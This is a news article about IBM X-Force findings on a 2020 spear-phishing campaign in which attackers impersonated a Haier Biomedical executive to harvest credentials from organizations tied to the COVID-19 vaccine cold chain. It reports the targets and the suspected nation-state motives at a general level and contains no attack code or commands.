A new global phishing attack is focused on disrupting supply chains designed to keep COVID-19 vaccine components cold.
On Thursday, researchers from the IBM Security X-Force team said that organizations connected to COVID-19 cold chains — part of the supply chain ensuring potential vaccines are stored and preserved safely at the right temperature — are being targeted by threat actors.
Scientists across the globe have worked at a furious pace over 2020 to try and develop safe and effective vaccines for the novel coronavirus. Funding has been poured into these projects from the offset, resulting in rapid transitions from creation to trials, and the UK has become the first country to accept one — developed by Pfizer and BioNTech — as safe for the public.
When some vaccines, including the Pfizer/BioNTech product, require storage at -70°C to preserve its efficacy, sustaining and protecting the cold storage components of a supply chain is critical.
According to IBM threat researchers Melissa Frydrych and Claire Zaboeva, unfortunately, this is the area that the new attack wave is focused on disrupting.
The operation started in September this year. Organizations believed to be associated with the Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program, launched in 2015 to strengthen vaccine supply chains, have been attacked across six countries.
The CCEOP is a key element in many vaccine transport and distribution initiatives, and so it may not come as a surprise that one of its main partner executives was the target chosen for impersonation.
IBM says that a business executive from Haier Biomedical, a Chinese member company and CCEOP supplier that claims to be the world’s only “complete cold chain provider,” was imitated by the group.
Spear phishing emails were sent under the guise of this identity to targets including the European Commission (EC), Directorate-General for Taxation and Customs Union, and entities in energy, manufacturing, finance, and IT in Europe and Taiwan.
Companies contacted with the fake emails were selected as potential providers of resources required by the COVID-19 vaccine cold chain. Phishing emails, apparently sent by the executive, ask for service quotes in relation to CCEOP vaccine projects. However, they contain malicious HTML attachments that open up locally and request various credentials before opening up.
It is suspected that the scheme is focused on credential harvesting and is an attempt to secure unauthorized access to corporate networks and resources for future use — as well as to exfiltrate any information concerning future vaccine distribution plans.
At this stage, IBM is unable to firmly attribute the phishing campaign with a particular threat group. However, “the precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft,” the company says.
“Without a clear path to a cash-out, cybercriminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets,” IBM added. “Likewise, insight into the transport of a vaccine may present a hot black-market commodity, however, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely a high-value and high-priority nation-state target.”
The organizations targeted through this global campaign have been contacted. In addition, DHS CISA is due to issue an alert to cold supply chain companies to review their cybersecurity posture in light of the new phishing scheme.
